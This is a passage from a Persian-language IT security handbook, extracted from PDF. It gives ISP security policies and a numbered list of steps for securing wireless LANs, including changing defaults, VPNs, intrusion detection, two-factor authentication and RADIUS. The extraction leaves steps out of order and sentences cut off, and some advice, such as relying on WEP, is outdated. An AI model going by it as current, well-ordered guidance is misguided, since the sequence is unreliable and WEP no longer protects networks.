ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻜﻪ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺗﺴﻬﻴﻞ ﻛﺮﺩﻩﺍﻳﺪ ،ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﻣـﺼﺮﻓﻲ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﺍﺩﻩﺍﻳﺪ. ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ،ﻭ .(... • ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺩﺭ ﺧﺼﻮﺹ ﭼﮕﻮﻧﮕﻲ ﻭﺍﻛـﻨﺶ ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥISP ،ﻫـﺎﻱ ﻫﻤﺘﺎ ،ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪﮔﺎﻥ ﻋﻤﺪﺓ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ،ﻭ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ. • ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺪﻣﺎﺕ ﺷـﻤﺎ ﺑـﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﻴﺮﻭﻧــﻲ ﺣﻤﻠــﻪ ﻛﻨﻨــﺪ .ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺑــﺮﺍﻱ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺳﺎﻳﺮ ISPﻫﺎ ﻣﺒﻨﻲ ﺑـﺮ ﺩﺳـﺖ ﺩﺍﺷﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺷﻤﺎ ﺩﺭ ﺣﻤﻼﺕ ،ﻳﻚ ﺳﻴﺎﺳﺖ ﺗـﺪﻭﻳﻦ ﻧﻤﺎﻳﻴﺪ. • ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺳﻄﺢ ISPﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﺑـﺮﺍﻱ ﻓﺮﺳﺘﻨﺪﺓ ﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﻫـﺸﺪﺍﺭﻫﺎﻳﻲ ﻣﺒﻨـﻲ ﺑـﺮ "ﻋـﺪﻡ ﺍﻧﺘﻘﺎﻝ ﻧﺎﻣﻪ ﺑﺪﻟﻴﻞ ﺁﻟﻮﺩﮔﻲ ﺑﻪ ﻭﻳﺮﻭﺱ" ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ. • ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﻣﺠﺎﺯ ) ٢٠٦(AUPﺗﺪﻭﻳﻦ ﻛﻨﻴـﺪ ﻛـﻪ ﺷﺎﻣﻞ ﻭﻇـﺎﻳﻒ ﻣﺘﻘﺎﺑـﻞ ISPﻭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺎﺷـﺪ .ﺍﻳـﻦ ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﺸﺘﺮﻱ ﻣـﻮﺭﺩ ﺍﺷـﺎﺭﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ. • ﺷﺒﻜﻪ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ ﻃﺮﺍﺣـﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﺎ ﺣـﺪ ﺍﻣﻜـﺎﻥ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻋﻤﻠﻲ ﺑﺎﺷﺪ .ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻭ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﻨﺪ )ﺍﺯ ﺟﻤﻠﻪ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ( ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺠﺰﺍ ﺷـﺪﻩ ﺑﺎﺷﻨﺪ. • ﺍﻃﻤﻴﻨﺎﻥ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺑﺨـﺶ ﻣﺪﻳﺮﻳﺖ ،ﺑﺨﺶ ﺧﺪﻣﺎﺕ )ﻣﺜـﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻭﺏ ،ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ Proxy ،ﻭ (DNSﻭ ﺗﻤــﺎﻡ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺴﻴﺮﻳﺎﺑﻲ ﻭ ﻛﻨﺘﺮﻟﻲ ﺷﺒﻜﻪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻣــﺴﺘﺤﻜﻢ ﻭ ﻗــﻮﺍﻧﻴﻦ ﺩﺳﺘﺮﺳــﻲ ﻣﺤﺪﻭﺩﺷــﺪﻩ ﺍﺳــﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ. 206 Acceptable Use Policy ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴـﺪ ﻛـﻪ ﻫﻤـﺔ ﺧـﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ )ﻣﺜـﻞ ٢١١ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﻴﺶ ﻓﺮﺽ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺭﺍ ﻣـﻲ ﺩﺍﻧﻨـﺪ ﻭ ﺍﺑﺘـﺪﺍ ﺁﻧﻬـﺎ ﺭﺍ ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ. ﺷﺎﻧﺰﺩﻩ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ WLAN ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺷﺒﻴﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜـﻲ ﺩﺭﺏ ﻭﺭﻭﺩﻱ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺳﺖ :ﻫﺮ ﻛﺴﻲ ﺑﺎ ﺍﻧﮕﻴﺰﻩ ،ﺑﻮﺩﺟﻪ ،ﻣﻨﺎﺑﻊ ،ﻭ ﺯﻣﺎﻥ ﻛﺎﻓﻲ ﻗﺎﺩﺭ ﺍﺳﺖ ﺁﻧﺮﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﺪ .ﺑﺎ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﺎﻳﺪ ﻣﺜـﻞ ﻳﻚ ﺷﺒﻜﺔ ﻫﻤﮕﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺑﺮﺍﻱ ﻋﻤـﻮﻡ ﺭﻓﺘـﺎﺭ ﻛـﺮﺩ. 
ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺗﺼﻮﺭ ﻛﻨﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﺧﺼﻮﺻﻲ ﻭ ﺍﻣﻦ ﺍﺳﺖ .ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻳﻤﻨـﻲ ﺯﻳـﺮ ﻛﻪ ﺑﺮﮔﺮﻓﺘﻪ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺍﻳﻦ ﺻﻨﻌﺖ ﺍﺳﺖ ،ﻧﻜـﺎﺕ ﺳـﺎﺩﻩﺍﻱ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ ﺟﻬـﺖ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ: .۲ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ ﻛـﻪ ﭼﻨـﺪ ﻧﻔـﺮ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺩﺭ ﻣﻨـﺰﻝ ﺍﺯ WLANﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺍﻳـﻦ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺑﺘـﻮﺍﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﺮﺩ. .۳ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ،ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﻪ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺁﻧﻬﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﺮﺩ. .۴ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﺭﻭﻱ ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎ ﻭ ﻻ ﻛﻠﻴـﺔ ﺧـﺪﻣﺎﺕ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﺻﻮ ﹰ ﻧﺎﺷﻨﺎﺧﺘﻪ ﻳﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﻳﺪ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ. .۵ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺶﻓﺮﺽ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻴـﺪ. ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﻣﺮﺗﻜﺐ ﺍﻳﻦ ﺍﺷـﺘﺒﺎﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ ﺍﻃﻼﻋــﺎﺕ SSIDﻳــﺎ ﺁﺩﺭﺱ IPﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ ﺭﺍ ﺍﺯ ﻣﻘﺪﺍﺭ ﺍﻭﻟﻴﺔ ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﻧﻤﻲﺩﻫﻨﺪ SSID .ﺭﺍ ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ ﻧﺪﻫﻴــﺪ ﻛــﻪ ﻧــﺎﻡ ،ﺑﺨــﺸﻬﺎ ،ﻭ ﻣﺤــﺼﻮﻻﺕ ﺷــﺮﻛﺖ ﺭﺍ ﻣـﺸﺨﺺ ﻛﻨــﺪ .ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ SSID ﺑﻮﺳﻴﻠﺔ ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺍﻋـﻼﻥ ﻋﻤـﻮﻣﻲ ﻣـﻲﺷـﻮﺩ ،ﺑـﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﻛﻠﻴﺪ WEPﺭﺍ ﺑـﺸﻜﻨﺪ ،ﺑﺮﺍﺣﺘـﻲ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻪ ﺷﺒﻜﺔ ﭼﻪ ﻛـﺴﻲ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﺮﺩﻩ ﺍﺳﺖ. .۶ ﺭﻣﺰ ﻋﺒﻮﺭ ﭘـﻴﺶﻓـﺮﺽ ﻧﻘﻄـﺔ ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﻣـﺴﻴﺮﻳﺎﺏ ﻻ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﺑﻲﺳﻴﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ .ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻌﻤﻮ ﹰ .۸ ﺑﺮﺍﻱ ﺑﺨﺸﻬﺎﻱ ﺑﻲ ﺳﻴﻢ ،ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘـﺪﺍﺭ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ. ﺑﻴــﺸﺘﺮ ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺑــﻲﺳــﻴﻢ ﺍﺯ ﺁﻧﺘﻨﻬــﺎﻱ ﭼﻨــﺪﺟﻬﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﭼﻨـﻴﻦ ﺁﻧﺘﻨﻬـﺎﻳﻲ ﺑـﻪ ﻣﻬـﺎﺟﻢ ﺍﻣﻜـﺎﻥ ﺿﺒﻂ ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛـﻪ ﺁﻧﺘﻨﻬﺎﻱ ﺟﻬﺘﺪﺍﺭ ﺍﮔﺮ ﺩﺭ ﻓﺮﻛﺎﻧﺴﻲ ﺣﺪﻭﺩ ۲،۴ﮔﻴﮕـﺎﻫﺮﺗﺰ ﻳﺎ ﺑﺎﻻﺗﺮ ﻛﺎﺭ ﻛﻨﻨﺪ ،ﮔﺴﺘﺮﺓ ﺍﻧﺘﺸﺎﺭ ﺳﻴﮕﻨﺎﻝ ﺑـﺴﻴﺎﺭ ﻛﻤﺘـﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ. .۹ WEPﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺑﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻛﻠﻴـﺪ ﭘـﻴﺶﻓـﺮﺽ WEPﺭﺍ ﺗﻐﻴﻴــﺮ ﺩﻫﻴــﺪ ﻭ ﺑﻌــﺪ ﺍﺯ ﺁﻥ ﺑــﺼﻮﺭﺕ ﻫﻔﺘﮕــﻲ ٢٠٧ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺗﻜﺮﺍﺭ ﻧﻤﺎﻳﻴﺪ. .۱۰ ﻣﻴﺎﻥ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ،ﺍﺯ ﺗﻮﻧـﻞ VPN ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ .ﺍﮔﺮﭼــﻪ ﺍﻳــﻦ ﺍﻣــﺮ ﻣــﺴﺘﻠﺰﻡ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ VPNﻣﻲﺑﺎﺷـﺪ ،ﺍﻣـﺎ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ، ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﺓ VPNﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻣﺜـﻞ ،Windows 2000 ،Windows 98 SEﻭ Windows XPﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﺳﺖ. .۱۱ﺭﻭﻱ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ،ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ ٢٠٩ ﺷﺒﻜﻪ ) ٢٠٨(NIDSﺗﻌﺒﻴﻪ ﻛﻨﻴﺪ. 
.۱۲ﺩﺭ ﺳﻄﺢ ﺳـﺎﺯﻣﺎﻥ ،ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ ﺭﺍ ﺭﻭﻱ ﺗﻤﺎﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻧﺼﺐ ﻛﻨﻴﺪ. ۲۰۷ﻣﻨﺒﻊNIPC : http://www.nipc.gov/publications/nipcpub/best pract.html 208 Network Based Intrusion Detection System ۲۰۹ﻣﻨﺒﻊ ،Chris Bateman :ﺗﺤﻠﻴﻠﮕﺮ CERT ﺑﺨﺶ ﺳﻮﻡ .۱ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑـﻲ ﺳـﻴﻢ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﺯﻣﺎﻥ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﻨﺪ. .۷ ﭘﻮﺷﺶ ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﺭﺍ ﺣـﺪﺍﻛﺜﺮ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻭﺳـﻌﺖ ﺳﺎﺧﺘﻤﺎﻥ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻭ ﻧﻪ ﺑﻴـﺸﺘﺮ .ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻣﺤﻠﻲ ﻣﻨﺎﺳﺐ ﺟﻬـﺖ ﺍﺳـﺘﻘﺮﺍﺭ ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﺪ ،ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻣﺤﻞ ﺁﻧﺮﺍ ﺩﺭ ﺟﺎﻳﻲ ﻣﺘﻤﺎﻳﻞ ﺑﻪ ﻣﺮﻛﺰ ﺳﺎﺧﺘﻤﺎﻥ ﺑﺮﮔﺰﻳﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩﻫﺎ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻗﻮﻳﺘﺮﻱ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻥ ﺗﺸﻌﺸﻊ ﻳﺎﺑﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﻳﮕﺮﺍﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﺭﺍ ﺁﺳﺎﻧﺘﺮ ﭘﻴﺪﺍ ﻛﻨﻨﺪ. ٢١٢ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ .۱۳ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋﺎﻣﻠﻲ ٢١٠ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ، ﭼﺮﺍﻛﻪ ﺩﺭﺻﺪ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ .ﺩﻭ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭﻋـﺎﻣﻠﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﺭﻭﺵ ﺍﻭﻝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ "ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻪ" ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺯﻳـﺴﺘﻲ ﺍﻓـﺮﺍﺩ ﺭﺍ ﺩﺭ ﺧـﻮﺩ ﺫﺧﻴــــﺮﻩ ﻣــــﻲﻛﻨﻨــــﺪ ٢١١.ﺭﻭﺵ ﺩﻭﻡ ﺍﺳــــﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩﻫﺎﻱ ٢١٢RADIUSﺍﺳﺖ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﺭﺗﺒـﺎﻁ ﺷـﻤﺎ ﺑـﺎ ﻧﻘﻄﺔ ﺗﻤﺎﺱ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ .ﻛﺎﺭﺑﺮ ﺻﺮﻓﹰﺎ ﺑﻤﻨﻈﻮﺭ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ ﺑــﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ RADIUSﻣﺘﺼﻞ ﻣﻲ ﺷﻮﺩ .ﺩﺭ ﺣﻘﻴﻘﺖ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﻩﻫـﺎﻱ RADIUSﻣﺜـﻞ ٢١٣ ﻧﮕﻬﺒﺎﻥ ﻳﻚ ﺳﺎﻟﻦ ،ﻋﺒﻮﺭ ﻭ ﻣﺮﻭﺭ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ. 
.۱۴ﺍﺯ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﻲﺳﻴﻢ ﺑﻌﻨﻮﺍﻥ gatewayﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ٢١٤.ﺍﻳﻦ ﺩﺳﺘﮕﺎﻩ ﻣﺜﻞ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺯ ﻧﻮﻉ ﺩﻭﻣﻨﺰﻟﻲ ٢١٥ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ ﺑﻄﻮﺭﻳﻜﻪ ﺷﺒﻜﺔ ﺑﻲ ﺳـﻴﻢ ﺩﺭ ﻳﻚ ﻃﺮﻑ ﻭ ﺷﺒﻜﺔ ﻣـﻮﺭﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺍﺧﻠـﻲ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕﺮ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺜــﻞ IPSecﻭ ﺳــﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ VPNﺍﺳــﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﺑﻪ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ .ﺑـﺮﺍﻱ ﻣﺤـﺪﻭﺩ 210 Two Factor Authentication Bateman ۲۱۱ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﺪ ﺍﺯ ﺭﻭﺷﻲ ﻛﻪ ﺍﻭ ﺁﻧـﺮﺍ e-thenticator ﻣﻲﻧﺎﻣﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ ،ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺨﺼﻮﺹ ،ﺍﺛﺮ ﺍﻧﮕﺸﺖ ﺷﺴﺖ ﺭﺍ ﺩﺭ ﻳﻚ ﻛﺎﺭﺕ ﻫﻮﺷﻤﻨﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ. 212 Remote Authentication Dial-In User Service RADIUS ۲۱۳ﻳﺎ ﻫﻤﺎﻥ "ﺳﺮﻭﻳﺲ ﺗﻠﻔﻨﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮ"، ﻳﻚ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻣﻲﻛﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻗﺮﺍﺭ ﺩﺍﺩ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺩﻫﺪ .ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻧﭽـﻪ 